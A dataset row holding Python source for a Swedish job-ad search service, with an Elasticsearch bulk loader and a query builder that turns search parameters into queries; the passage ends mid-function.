metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "JobtechSwe/castaway",
"score": 2
} |
#### File: castaway/bulkloader/repository.py
```python
import datetime
import logging
import json
import time
import zipfile
from flask_restx import Namespace
from datetime import date, timedelta
from io import BytesIO
from elasticsearch.helpers import scan
from sokannonser import settings
from sokannonser.repository import elastic
from sokannonser.rest.model.result_models import job_ad
from sokannonser.repository.querybuilder import calculate_utc_offset
log = logging.getLogger(__name__)
marshaller = Namespace('Marshaller')
offset = calculate_utc_offset()
def _es_dsl():
dsl = {
"query": {
"bool": {
"filter": [
{
"range": {
"publication_date": {
"lte": "now/m+%dH/m" % offset
}
}
},
{
"range": {
"last_publication_date": {
"gte": "now/m+%dH/m" % offset
}
}
}
]
}
},
}
return dsl
def zip_ads(day, start_time=0):
if start_time == 0:
start_time = int(time.time() * 1000)
dsl = _es_dsl()
index = settings.ES_STREAM_INDEX if _index_exists(settings.ES_STREAM_INDEX) \
else settings.ES_INDEX
if day == 'all':
dsl['query']['bool']['must'] = [{"match_all": {}}]
else:
ts_from = convert_to_timestamp('%sT00:00:00' % str(day))
ts_to = convert_to_timestamp('%sT23:59:59' % str(day))
dsl['query']['bool']['must'] = [{
"range": {
"timestamp": {
"gte": ts_from,
"lte": ts_to
}
}
}]
log.debug('zip_ads, dsl: %s' % dsl)
scan_result = scan(elastic, dsl, index=index)
in_memory = BytesIO()
zf = zipfile.ZipFile(in_memory, "w", zipfile.ZIP_DEFLATED)
ads = [ad['_source'] for ad in scan_result]
log.debug("Number of ads: %d" % len(ads))
zf.writestr(f"ads_{day}.json", json.dumps(ads))
zf.close()
in_memory.seek(0)
log.debug("File constructed after %d milliseconds."
% (int(time.time() * 1000) - start_time))
return in_memory
def _index_exists(idx_name):
return elastic.indices.exists_alias(name=[idx_name]) \
or elastic.indices.exists(index=[idx_name])
def convert_to_timestamp(day):
if not day:
return None
ts = 0
for dateformat in [
'%Y-%m-%dT%H:%M:%S'
]:
try:
ts = time.mktime(time.strptime(day, dateformat)) * 1000
log.debug("Converted date %s to %d" % (day, ts))
break
except ValueError as e:
log.debug("Failed to convert date %s" % day, e)
return int(ts)
# Generator function
def load_all(args):
since = args.get(settings.DATE)
# time span, default is None
if args.get(settings.UPDATED_BEFORE_DATE, None):
before = args.get(settings.UPDATED_BEFORE_DATE)
else:
before = datetime.datetime.strptime(settings.MAX_DATE, '%Y-%m-%dT%H:%M:%S')
# input is not allowed by type=inputs.datetime_from_iso8601
if since == 'yesterday':
since = (date.today() - timedelta(1)).strftime('%Y-%m-%d')
ts = int(time.mktime(since.timetuple())) * 1000
# add 1 sec to find ad (ms truncation problem)
bets = int(time.mktime(before.timetuple())+1) * 1000
index = settings.ES_STREAM_INDEX if _index_exists(settings.ES_STREAM_INDEX) \
else settings.ES_INDEX
log.debug("Elastic index(load_all): % s" % index)
dsl = _es_dsl()
dsl['query']['bool']['must'] = [{
"range": {
"timestamp": {
"gte": ts,
"lte": bets
}
}
}]
occupation_concept_ids = args.get(settings.OCCUPATION_CONCEPT_ID)
if occupation_concept_ids:
occupation_list = [occupation + '.' + 'concept_id.keyword' for occupation in settings.OCCUPATION_LIST]
add_filter_query(dsl, occupation_list, occupation_concept_ids)
location_concept_ids = args.get(settings.LOCATION_CONCEPT_ID)
if location_concept_ids:
location_list = ['workplace_address.' + location + '_concept_id' for location in settings.LOCATION_LIST]
add_filter_query(dsl, location_list, location_concept_ids)
log.debug('QUERY(load_all): %s' % json.dumps(dsl))
scan_result = scan(elastic, dsl, index=index)
counter = 0
yield '['
for ad in scan_result:
if counter > 0:
yield ','
source = ad['_source']
if source.get('removed', False):
yield json.dumps(format_removed_ad(source))
else:
yield json.dumps(format_ad(source))
counter += 1
log.debug("Delivered %d ads as stream" % counter)
yield ']'
def add_filter_query(dsl, items, concept_ids):
# add occupation or location filter query
should_query = []
for concept_id in concept_ids:
if concept_id:
for item in items:
should_query.append({"term": {
item: concept_id
}})
dsl['query']['bool']['filter'].append({"bool": {"should": should_query}})
return dsl
@marshaller.marshal_with(job_ad)
def format_ad(ad_data):
return ad_data
# @marshaller.marshal_with(removed_job_ad)
def format_removed_ad(ad_data):
if ad_data.get('occupation', None):
occupation = ad_data.get('occupation', None).get('concept_id', None)
else:
occupation = None
if ad_data.get('occupation_group', None):
occupation_group = ad_data.get('occupation_group', None).get('concept_id', None)
else:
occupation_group = None
if ad_data.get('occupation_field', None):
occupation_field = ad_data.get('occupation_field', None).get('concept_id', None)
else:
occupation_field = None
if ad_data.get('workplace_address', None):
municipality = ad_data.get('workplace_address', None).get('municipality_concept_id', None)
region = ad_data.get('workplace_address', None).get('region_concept_id', None)
country = ad_data.get('workplace_address', None).get('country_concept_id', None)
else:
municipality = None
region = None
country = None
return {
'id': str(ad_data.get('id')),
'removed': ad_data.get('removed'),
'removed_date': ad_data.get('removed_date'),
'occupation': occupation,
'occupation_group': occupation_group,
'occupation_field': occupation_field,
'municipality': municipality,
'region': region,
'country': country
}
def load_snapshot():
index = settings.ES_STREAM_INDEX if _index_exists(settings.ES_STREAM_INDEX) \
else settings.ES_INDEX
dsl = _es_dsl()
dsl['query']['bool']['filter'].append({"term": {"removed": False}})
log.debug('QUERY(load_all): %s' % json.dumps(dsl))
scan_result = scan(elastic, dsl, index=index)
counter = 0
yield '['
for ad in scan_result:
if counter > 0:
yield ','
source = ad['_source']
yield json.dumps(format_ad(source))
counter += 1
log.debug("Delivered %d ads as stream" % counter)
yield ']'
```
#### File: sokannonser/repository/querybuilder.py
```python
import json
import logging
import re
import time
from collections import defaultdict
from datetime import datetime, timedelta
import elasticsearch_dsl
from dateutil import parser
from sokannonser import settings
from sokannonser.repository import taxonomy, TextToConcept
from sokannonser.rest.model import queries
from sokannonser.rest.model import fields as f
log = logging.getLogger(__name__)
class QueryBuilder(object):
def __init__(self, text_to_concept=TextToConcept(ontologyhost=settings.ES_HOST,
ontologyport=settings.ES_PORT,
ontologyuser=settings.ES_USER,
ontologypwd=settings.ES_PWD)):
self.ttc = text_to_concept
self.occupation_collections = taxonomy.fetch_occupation_collections()
def parse_args(self, args, x_fields=None):
"""
Parse arguments for query and return an elastic query dsl
Keyword arguments:
args -- dictionary containing parameters from query
"""
query_dsl = self._bootstrap_query(args, x_fields)
# Check for empty query
if not any(v is not None for v in args.values()) \
or not args.get(settings.CONTEXTUAL_TYPEAHEAD, True):
log.debug("Constructing match-all query")
query_dsl['query']['bool']['must'].append({'match_all': {}})
if 'sort' not in query_dsl:
query_dsl['sort'] = [f.sort_options.get('pubdate-desc')]
return query_dsl
must_queries = list()
# bool args
abroad = self._parse_boolean_arg(args.get(settings.ABROAD))
unspecified_workplace = self._parse_boolean_arg(args.get(settings.UNSPECIFIED_SWEDEN_WORKPLACE))
remote = self._parse_boolean_arg(args.get(settings.REMOTE))
drivers_licence = self._parse_boolean_arg(args.get(taxonomy.DRIVING_LICENCE_REQUIRED))
experience = self._parse_boolean_arg(args.get(settings.EXPERIENCE_REQUIRED))
must_queries.append(
self._build_freetext_query(args.get(settings.FREETEXT_QUERY),
args.get(settings.FREETEXT_FIELDS),
args.get(settings.X_FEATURE_FREETEXT_BOOL_METHOD),
args.get(settings.X_FEATURE_DISABLE_SMART_FREETEXT),
args.get(settings.X_FEATURE_ENABLE_FALSE_NEGATIVE, False)))
must_queries.append(self._build_employer_query(args.get(settings.EMPLOYER)))
must_queries.append(self._build_yrkes_query(args.get(taxonomy.OCCUPATION),
args.get(taxonomy.GROUP),
args.get(taxonomy.FIELD)))
must_queries.append(self.build_yrkessamlingar_query(args.get(taxonomy.COLLECTION)))
must_queries.append(self._filter_timeframe(args.get(settings.PUBLISHED_AFTER),
args.get(settings.PUBLISHED_BEFORE)))
must_queries.append(self._build_parttime_query(args.get(settings.PARTTIME_MIN),
args.get(settings.PARTTIME_MAX)))
must_queries.append(self._build_plats_query(args.get(taxonomy.MUNICIPALITY),
args.get(taxonomy.REGION),
args.get(taxonomy.COUNTRY),
unspecified_workplace,
abroad))
must_queries.append(self._build_remote_plats_query(remote))
must_queries.append(self._build_generic_query([f.MUST_HAVE_SKILLS + "." +
f.CONCEPT_ID + ".keyword",
f.MUST_HAVE_SKILLS + "." +
f.LEGACY_AMS_TAXONOMY_ID,
f.NICE_TO_HAVE_SKILLS + "." +
f.CONCEPT_ID + ".keyword",
f.NICE_TO_HAVE_SKILLS + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.SKILL)))
must_queries.append(self._build_generic_query([f.MUST_HAVE_LANGUAGES + "." +
f.CONCEPT_ID + ".keyword",
f.MUST_HAVE_LANGUAGES + "." +
f.LEGACY_AMS_TAXONOMY_ID,
f.NICE_TO_HAVE_LANGUAGES + "." +
f.CONCEPT_ID + ".keyword",
f.NICE_TO_HAVE_LANGUAGES + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.LANGUAGE)))
must_queries.append(self._build_generic_query([f.WORKING_HOURS_TYPE + "." +
f.CONCEPT_ID + ".keyword",
f.WORKING_HOURS_TYPE + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.WORKTIME_EXTENT)))
must_queries.append(self._build_generic_query([f.DRIVING_LICENCE + "." +
f.CONCEPT_ID + ".keyword",
f.DRIVING_LICENCE + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.DRIVING_LICENCE)))
must_queries.append(self._build_generic_query([f.EMPLOYMENT_TYPE + "." +
f.CONCEPT_ID + ".keyword",
f.EMPLOYMENT_TYPE + "." +
f.LEGACY_AMS_TAXONOMY_ID],
args.get(taxonomy.EMPLOYMENT_TYPE)))
if isinstance(drivers_licence, bool):
must_queries.append(
{"term": {
f.DRIVING_LICENCE_REQUIRED: drivers_licence
}}
)
# TODO: Maybe check if NO skills are listed in ad instead?
if isinstance(experience, bool):
must_queries.append({"term": {f.EXPERIENCE_REQUIRED: experience}})
filter_queries = list()
geo_filter = self._build_geo_dist_filter(args.get(settings.POSITION),
args.get(settings.POSITION_RADIUS))
filter_queries.append(geo_filter)
query_dsl = self._assemble_queries(query_dsl, must_queries, filter_queries)
for stat in args.get(settings.STATISTICS) or []:
query_dsl['aggs'][stat] = {
"terms": {
"field": f.stats_options[stat],
"size": args.get(settings.STAT_LMT) or 5
},
"aggs": {
"id_and_name": {
"top_hits": {
"size": 1,
"_source": {"includes": [f.stats_concept_id_options[stat], f.stats_concept_name_options[stat]]}
}
}
}
}
return query_dsl
@staticmethod
def filter_aggs(aggs, freetext):
# will not use in future
fwords = freetext.split(' ') if freetext else []
value_dicts = []
for agg in aggs:
if agg.startswith('complete_'):
value_dicts += [{"type": agg[12:], **bucket}
for bucket in aggs[agg]['buckets']]
filtered_aggs = []
value_list = []
for kv in sorted(value_dicts, key=lambda k: k['doc_count'], reverse=True):
found_words = kv['key'].split(' ')
value = ' '.join([w for w in found_words if w not in fwords])
if kv['key'] not in fwords and value not in value_list:
ac_hit = {
"value": value,
"found_phrase": kv['key'],
"type": kv['type'],
"occurrences": kv['doc_count']
}
value_list.append(value)
filtered_aggs.append(ac_hit)
if len(filtered_aggs) > 50:
return filtered_aggs[0:50]
return filtered_aggs
def _parse_x_fields(self, x_fields):
# Remove all spaces from field
x_fields = re.sub(r'\s', '', x_fields).lower()
if 'hits{' in x_fields:
# Find out which fields are wanted
hitsfields = self._find_hits_subelement(x_fields)
# Remove lower nestings
hitsfields = re.sub("[{].*?[}]", "", hitsfields)
fieldslist = hitsfields.split(',')
if f.AD_URL in fieldslist:
fieldslist.append('id')
return fieldslist
return []
@staticmethod
def _find_hits_subelement(text):
istart = [] # stack of indices of opening parentheses
bracket_positions = {}
for i, c in enumerate(text):
if c == '{':
istart.append(i)
if c == '}':
try:
bracket_positions[istart.pop()] = i
except IndexError:
pass
idx = text.find('hits{') + 4
r = text[idx + 1:bracket_positions[idx]]
return r
def _bootstrap_query(self, args, x_fields):
query_dsl = dict()
query_dsl['from'] = args.pop(settings.OFFSET, 0)
query_dsl['size'] = args.pop(settings.LIMIT, 10)
# No need to track all results if used for typeahead
if not args.get(settings.TYPEAHEAD_QUERY):
query_dsl['track_total_hits'] = True
query_dsl['track_scores'] = True
if args.pop(settings.DETAILS, '') == queries.OPTIONS_BRIEF:
query_dsl['_source'] = [f.ID, f.HEADLINE, f.APPLICATION_DEADLINE,
f.EMPLOYMENT_TYPE + "." + f.LABEL,
f.WORKING_HOURS_TYPE + "." + f.LABEL,
f.EMPLOYER_NAME,
f.PUBLICATION_DATE]
if x_fields:
query_dsl['_source'] = self._parse_x_fields(x_fields)
# Remove api-key from args to make sure an empty query can occur
if settings.APIKEY in args:
args.pop(settings.APIKEY)
# Make sure to only serve published ads
offset = calculate_utc_offset()
query_dsl['query'] = {
'bool': {
'must': [],
'filter': [
{
'range': {
f.PUBLICATION_DATE: {
'lte': 'now+%dH/m' % offset
}
}
},
{
'range': {
f.LAST_PUBLICATION_DATE: {
'gte': 'now+%dH/m' % offset
}
}
},
{
'term': {
f.REMOVED: False
}
},
]
},
}
query_dsl['aggs'] = {
"positions": {
"sum": {"field": f.NUMBER_OF_VACANCIES}
}
}
complete_string = args.get(settings.TYPEAHEAD_QUERY)
complete_fields = args.get(settings.FREETEXT_FIELDS)
if not complete_fields:
complete_fields = queries.QF_CHOICES.copy()
complete_fields.remove('employer')
complete_string = self._rewrite_word_for_regex(complete_string)
word_list = complete_string.split(' ')
complete = word_list[-1]
ngrams_complete = []
for n in list(range(len(word_list) - 1)):
ngrams_complete.append(' '.join(word_list[n:]))
size = 60 / len(complete_fields)
enriched_typeahead_field = f.KEYWORDS_ENRICHED_SYNONYMS
for field in complete_fields:
base_field = f.KEYWORDS_EXTRACTED \
if field in ['employer'] else enriched_typeahead_field
query_dsl['aggs']["complete_00_%s" % field] = {
"terms": {
"field": "%s.%s.raw" % (base_field, field),
"size": size,
"include": "%s.*" % self._escape_special_chars_for_complete(complete)
}
}
x = 1
for ngram in ngrams_complete:
if ngram != complete:
query_dsl['aggs']["complete_%s_%s_remainder" % (str(x).zfill(2), field)] = {
"terms": {
"field": "%s.%s.raw" % (base_field, field),
"size": size,
"include": "%s.*" % self._escape_special_chars_for_complete(ngram)
}
}
x += 1
if args.get(settings.SORT) and args.get(settings.SORT) in f.sort_options.keys():
query_dsl['sort'] = f.sort_options.get(args.pop(settings.SORT))
else:
query_dsl['sort'] = f.sort_options.get('relevance')
return query_dsl
@staticmethod
def _parse_boolean_arg(arg):
if isinstance(arg, bool):
return arg
elif isinstance(arg, str):
if arg.lower() == 'true':
return True
elif arg.lower() == 'false':
return False
else:
return arg
else:
return arg
@staticmethod
def _escape_special_chars_for_complete(inputstr):
escaped_str = inputstr
chars_to_escape = ['#']
for char in chars_to_escape:
if char in inputstr:
escaped_str = inputstr.replace(char, '[%s]' % char)
return escaped_str
@staticmethod
def _assemble_queries(query_dsl, additional_queries, additional_filters):
for query in additional_queries:
if query:
query_dsl['query']['bool']['must'].append(query)
for af in additional_filters:
if af:
query_dsl['query']['bool']['filter'].append(af)
return query_dsl
@staticmethod
def _rewrite_word_for_regex(word):
if word is None:
word = ''
bad_chars = ['+', '.', '[', ']', '{', '}', '(', ')', '^', '$',
'*', '\\', '|', '?', '"', '\'', '&', '<', '>']
if any(c in bad_chars for c in word):
modded_term = ''
for c in word:
if c in bad_chars:
modded_term += '\\'
modded_term += c
return modded_term
return word
@staticmethod
def extract_quoted_phrases(text):
text = ' '.join([w.strip(',!?:;\' ') for w in re.split('\\s|\\,', text)])
if text.count('"') == 1:
if text[:1] == '"':
text += '"'
else:
text = text.strip('"')
must_matches = re.findall(r'\+\"(.+?)\"', text)
neg_matches = re.findall(r'\-\"(.+?)\"', text)
for neg_match in neg_matches:
text = re.sub('-"%s"' % neg_match, '', text)
for must_match in must_matches:
text = re.sub(r'\+"%s"' % must_match, '', text)
matches = re.findall(r'\"([^\"]+?)\"', text)
for match in matches:
text = re.sub(r'\"*%s\"*' % QueryBuilder._rewrite_word_for_regex(match), '', text)
return {"phrases": matches, "phrases_must": must_matches,
"phrases_must_not": neg_matches}, text.strip()
# Parses FREETEXT_QUERY and FREETEXT_FIELDS
def _build_freetext_query(self, querystring, queryfields, freetext_bool_method,
disable_smart_freetext, enable_false_negative=False):
if not querystring:
return None
if not queryfields:
queryfields = queries.QF_CHOICES.copy()
(phrases, querystring) = self.extract_quoted_phrases(querystring)
original_querystring = querystring
concepts = {} if disable_smart_freetext else self.ttc.text_to_concepts(querystring)
querystring = self._rewrite_querystring(querystring, concepts)
ft_query = self._create_base_ft_query(querystring, freetext_bool_method)
# Make all "musts" concepts "shoulds" as well
for qf in queryfields:
if qf in concepts:
must_key = <KEY>
concepts[qf] += [c for c in concepts.get(must_key, [])]
# Add concepts to query
for concept_type in queryfields:
sub_should = self._freetext_concepts({"bool": {}}, concepts,
[concept_type], "should", enable_false_negative)
if 'should' in sub_should['bool']:
if 'must' not in ft_query['bool']:
ft_query['bool']['must'] = []
ft_query['bool']['must'].append(sub_should)
# Remove unwanted concepts from query
self._freetext_concepts(ft_query, concepts, queryfields, 'must_not', enable_false_negative)
# Require musts
self._freetext_concepts(ft_query, concepts, queryfields, 'must', enable_false_negative)
self._add_phrases_query(ft_query, phrases)
freetext_headline = phrases.get('phrases', [])
ft_query = self._freetext_headline(ft_query, freetext_headline, original_querystring)
return ft_query
# Add phrase queries
@staticmethod
def _add_phrases_query(ft_query, phrases):
for bool_type in ['should', 'must', 'must_not']:
key = 'phrases' if bool_type == 'should' else "phrases_%s" % bool_type
for phrase in phrases[key]:
if bool_type not in ft_query['bool']:
ft_query['bool'][bool_type] = []
ft_query['bool'][bool_type].append({"multi_match":
{"query": phrase,
"fields": ["headline", "description.text"],
"type": "phrase"}})
return ft_query
# Removes identified concepts from querystring
def _rewrite_querystring(self, querystring, concepts):
# Sort all concepts by string length
all_concepts = sorted(concepts.get('occupation', []) +
concepts.get('occupation_must', []) +
concepts.get('occupation_must_not', []) +
concepts.get('skill', []) +
concepts.get('skill_must', []) +
concepts.get('skill_must_not', []) +
concepts.get('location', []) +
concepts.get('location_must', []) +
concepts.get('location_must_not', []),
key=lambda c: len(c),
reverse=True)
# Remove found concepts from querystring
for term in [concept['term'] for concept in all_concepts]:
term = self._rewrite_word_for_regex(term)
p = re.compile(f'(^|\\s+)(\\+{term}|\\-{term}|{term})(\\s+|$)')
querystring = p.sub('\\1\\3', querystring).strip()
# Remove duplicate spaces
querystring = re.sub('\\s+', ' ', querystring).strip()
return querystring
def _create_base_ft_query(self, querystring, method):
method = 'and' if method == 'and' else settings.DEFAULT_FREETEXT_BOOL_METHOD
# Creates a base query dict for "independent" freetext words
# (e.g. words not found in text_to_concepts)
suffix_words = ' '.join([w[1:] for w in querystring.split(' ')
if w.startswith('*')])
prefix_words = ' '.join([w[:-1] for w in querystring.split(' ')
if w and w.endswith('*')])
inc_words = ' '.join([w for w in querystring.split(' ')
if w and not w.startswith('+')
and not w.startswith('-') and not w.startswith('*')
and not w.endswith('*')])
req_words = ' '.join([w[1:] for w in querystring.split(' ')
if w.startswith('+')
and w[1:].strip()])
exc_words = ' '.join([w[1:] for w in querystring.split(' ')
if w.startswith('-')
and w[1:].strip()])
shoulds = self._freetext_fields(inc_words, method) if inc_words else []
musts = self._freetext_fields(req_words, method) if req_words else []
mustnts = self._freetext_fields(exc_words, method) if exc_words else []
ft_query = {"bool": {}}
# Add "common" words to query
if shoulds or musts or prefix_words or suffix_words:
ft_query['bool']['must'] = []
if shoulds:
# Include all "must" words in should, to make sure any single "should"-word
# not becomes exclusive
if 'must' not in ft_query['bool']:
ft_query['bool']['must'] = []
ft_query['bool']['must'].append({"bool": {"should": shoulds + musts}})
# Wildcards after shoulds so they don't end up there
if prefix_words:
musts += self._freetext_wildcard(prefix_words, "prefix", method)
if suffix_words:
musts += self._freetext_wildcard(suffix_words, "suffix", method)
if musts:
ft_query['bool']['must'].append({"bool": {"must": musts}})
if mustnts:
ft_query['bool']['must_not'] = mustnts
return ft_query
@staticmethod
def _freetext_fields(searchword, method=settings.DEFAULT_FREETEXT_BOOL_METHOD):
return [{
"multi_match": {
"query": searchword,
"type": "cross_fields",
"operator": method,
"fields": [f.HEADLINE + "^3", f.KEYWORDS_EXTRACTED + ".employer^2",
f.DESCRIPTION_TEXT, f.ID, f.EXTERNAL_ID, f.SOURCE_TYPE,
f.KEYWORDS_EXTRACTED + ".location^5"]
}
}]
@staticmethod
def _freetext_wildcard(searchword, wildcard_side, method=settings.DEFAULT_FREETEXT_BOOL_METHOD):
return [{
"multi_match": {
"query": searchword,
"type": "cross_fields",
"operator": method,
"fields": [f.HEADLINE + "." + wildcard_side,
f.DESCRIPTION_TEXT + "." + wildcard_side]
}
}]
@staticmethod
def _freetext_headline(query_dict, freetext_headline, querystring):
# Remove plus and minus from querystring for headline search
freetext_headline = ' '.join(
['"' + re.sub(r'(^| )[\\+]{1}', ' ', string) + '"' for string in freetext_headline])
querystring = freetext_headline + re.sub(r'(^| )[\\+]{1}', ' ', querystring)
if 'must' not in query_dict['bool']:
query_dict['bool']['must'] = []
for should in query_dict['bool']['must']:
log.info(should)
try:
match = {
"match": {
f.HEADLINE + ".words": {
"query": querystring.strip(),
"operator": "and",
"boost": 5
}
}
}
if 'should' in should.get('bool', {}):
should['bool']['should'].append(match)
except KeyError:
log.error("No bool clause for headline query")
return query_dict
def _freetext_concepts(self, query_dict, concepts,
concept_keys, bool_type, enable_false_negative=False):
for key in concept_keys:
dict_key = "%s_%s" % (key, bool_type) if bool_type != 'should' else key
current_concepts = [c for c in concepts.get(dict_key, []) if c]
for concept in current_concepts:
if bool_type not in query_dict['bool']:
query_dict['bool'][bool_type] = []
base_fields = []
if key == 'location' and bool_type != 'must':
base_fields.append(f.KEYWORDS_EXTRACTED)
base_fields.append(f.KEYWORDS_ENRICHED)
# Add freetext search for location that does not exist
# in extracted locations, for example 'kallhäll'.
value = concept['term'].lower()
if value not in self.ttc.ontology.extracted_locations:
geo_ft_query = self._freetext_fields(value)
query_dict['bool'][bool_type].append(geo_ft_query[0])
elif key == 'occupation' and bool_type != 'must':
base_fields.append(f.KEYWORDS_EXTRACTED)
base_fields.append(f.KEYWORDS_ENRICHED)
else:
curr_base_field = f.KEYWORDS_EXTRACTED \
if key in ['employer'] else f.KEYWORDS_ENRICHED
base_fields.append(curr_base_field)
for base_field in base_fields:
if base_field == f.KEYWORDS_EXTRACTED:
value = concept['term'].lower()
boost_value = 10
else:
value = concept['concept'].lower()
boost_value = 9
field = "%s.%s.raw" % (base_field, key)
query_dict['bool'][bool_type].append(
{
"term": {
field: {
"value": value,
"boost": boost_value
}
}
}
)
if enable_false_negative and base_field == f.KEYWORDS_ENRICHED and (
key == 'skill'):
# Add extra search for the current known term in headline, employer and description to be sure
# not to miss search hits where the term wasn't identified during enrichment. Only search
# skills to avoid irrelevant hits on occupations and locations...
query_dict['bool'][bool_type].append(
{'multi_match': {
'query': concept['term'].lower(),
'type': 'cross_fields',
'operator': 'and',
'fields': [
'headline^0.1',
'keywords.extracted.employer^0.1',
'description.text^0.1'
]
}}
)
return query_dict
# Parses EMPLOYER
@staticmethod
def _build_employer_query(employers):
if employers:
bool_segment = {"bool": {"should": [], "must_not": [], "must": []}}
for employer in employers:
negative_search = employer.startswith('-')
positive_search = employer.startswith('+')
bool_type = 'should'
if negative_search or positive_search:
employer = employer[1:]
bool_type = 'must_not' if negative_search else 'must'
if employer.isdigit():
bool_segment['bool'][bool_type].append(
{"prefix": {f.EMPLOYER_ORGANIZATION_NUMBER: employer}}
)
else:
bool_segment['bool'][bool_type].append(
{
"multi_match": {
"query": " ".join(employers),
"operator": "or",
"fields": [f.EMPLOYER_NAME,
f.EMPLOYER_WORKPLACE]
}
}
)
return bool_segment
return None
# Parses OCCUPATION, FIELD, GROUP and COLLECTIONS
@staticmethod
def _build_yrkes_query(yrkesroller, yrkesgrupper, yrkesomraden):
yrken = yrkesroller or []
yrkesgrupper = yrkesgrupper or []
yrkesomraden = yrkesomraden or []
yrke_term_query = [{
"term": {
f.OCCUPATION + "." + f.CONCEPT_ID + ".keyword": {
"value": y,
"boost": 2.0}}} for y in yrken if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y,
"boost": 2.0}}} for y in yrken if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION_GROUP + "." + f.CONCEPT_ID + ".keyword": {
"value": y,
"boost": 1.0}}} for y in yrkesgrupper if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION_GROUP + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y,
"boost": 1.0}}} for y in yrkesgrupper if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION_FIELD + "." + f.CONCEPT_ID + ".keyword": {
"value": y,
"boost": 1.0}}} for y in yrkesomraden if y and not y.startswith('-')]
yrke_term_query += [{
"term": {
f.OCCUPATION_FIELD + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y,
"boost": 1.0}}} for y in yrkesomraden if y and not y.startswith('-')]
neg_yrke_term_query = [{
"term": {
f.OCCUPATION + "." + f.CONCEPT_ID + ".keyword": {
"value": y[1:]}}} for y in yrken if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y[1:]}}} for y in yrken if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION_GROUP + "." + f.CONCEPT_ID + ".keyword": {
"value": y[1:]}}} for y in yrkesgrupper if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION_GROUP + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y[1:]}}} for y in yrkesgrupper if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION_FIELD + "." + f.CONCEPT_ID + ".keyword": {
"value": y[1:]}}} for y in yrkesomraden if y and y.startswith('-')]
neg_yrke_term_query += [{
"term": {
f.OCCUPATION_FIELD + "." + f.LEGACY_AMS_TAXONOMY_ID: {
"value": y[1:]}}} for y in yrkesomraden if y and y.startswith('-')]
if yrke_term_query or neg_yrke_term_query:
query = {'bool': {}}
if yrke_term_query:
query['bool']['should'] = yrke_term_query
if neg_yrke_term_query:
query['bool']['must_not'] = neg_yrke_term_query
return query
else:
return None
# Parses OCCUPATION, FIELD, GROUP and COLLECTIONS
def build_yrkessamlingar_query(self, yrkessamlingar):
start_time = int(time.time() * 1000)
if not yrkessamlingar:
return None
yrken_in_yrkessamlingar_id = []
neg_yrken_in_yrkessamlingar_id = []
# Parse yrkessamlingar from search input and add the occupations that is included to yrken_in_yrkessamlingar_id...
for yrkessamling in yrkessamlingar:
if yrkessamling:
# If negative filter on yrkessamling:
if str(yrkessamling).startswith('-'):
neg_yrkessamling = yrkessamling[1:]
if neg_yrkessamling in self.occupation_collections:
neg_yrken_in_yrkessamlingar_id += self.occupation_collections.get(
neg_yrkessamling)
# If positive filter on yrkessamling:
else:
if yrkessamling in self.occupation_collections:
yrken_in_yrkessamlingar_id += self.occupation_collections.get(yrkessamling)
if yrken_in_yrkessamlingar_id or neg_yrken_in_yrkessamlingar_id:
query = {'bool': {}}
if yrken_in_yrkessamlingar_id:
query['bool']['should'] = {
"terms": {
f.OCCUPATION + "." + f.CONCEPT_ID + ".keyword":
yrken_in_yrkessamlingar_id}
}
if neg_yrken_in_yrkessamlingar_id:
query['bool']['must_not'] = {
"terms": {
f.OCCUPATION + "." + f.CONCEPT_ID + ".keyword":
neg_yrken_in_yrkessamlingar_id}
}
log.debug("Occupation-collections Query results after %d milliseconds."
% (int(time.time() * 1000) - start_time))
return query
else:
return None
# Parses MUNICIPALITY and REGION
@staticmethod
def _build_plats_query(kommunkoder, lanskoder, landskoder, unspecify, abroad):
kommuner = []
neg_komm = []
lan = []
neg_lan = []
land = []
neg_land = []
for kkod in kommunkoder if kommunkoder else []:
if kkod.startswith('-'):
neg_komm.append(kkod[1:])
else:
kommuner.append(kkod)
for lkod in lanskoder if lanskoder else []:
if lkod.startswith('-'):
neg_lan.append(lkod[1:])
else:
lan.append(lkod)
for ckod in landskoder if landskoder else []:
if ckod.startswith('-'):
neg_land.append(ckod[1:])
else:
land.append(ckod)
plats_term_query = [{"term": {
f.WORKPLACE_ADDRESS_MUNICIPALITY_CODE: {
"value": kkod, "boost": 2.0}}} for kkod in kommuner]
plats_term_query += [{"term": {
f.WORKPLACE_ADDRESS_MUNICIPALITY_CONCEPT_ID: {
"value": kkod, "boost": 2.0}}} for kkod in kommuner]
# Add unspecified field, when it is true, system will return all adds with unspecified in Sweden.
if unspecify:
plats_term_query += [
{
"bool": {
"filter": {"term": {f.WORKPLACE_ADDRESS_COUNTRY_CONCEPT_ID: {
"value": settings.SWEDEN_CONCEPT_ID}}},
"must_not": {"exists": {"field": f.WORKPLACE_ADDRESS_REGION_CONCEPT_ID}},
"boost": 1.0
}
},
]
if abroad:
plats_term_query += [
{
"bool": {
"must_not": {"term": {f.WORKPLACE_ADDRESS_COUNTRY_CONCEPT_ID: {
"value": settings.SWEDEN_CONCEPT_ID}}},
"boost": 1.0
}
},
]
plats_term_query += [{"term": {
f.WORKPLACE_ADDRESS_REGION_CODE: {
"value": lkod, "boost": 1.0}}} for lkod in lan]
plats_term_query += [{"term": {
f.WORKPLACE_ADDRESS_REGION_CONCEPT_ID: {
"value": lkod, "boost": 1.0}}} for lkod in lan]
plats_term_query += [{"term": {
f.WORKPLACE_ADDRESS_COUNTRY_CODE: {
"value": ckod, "boost": 1.0}}} for ckod in land]
plats_term_query += [{"term": {
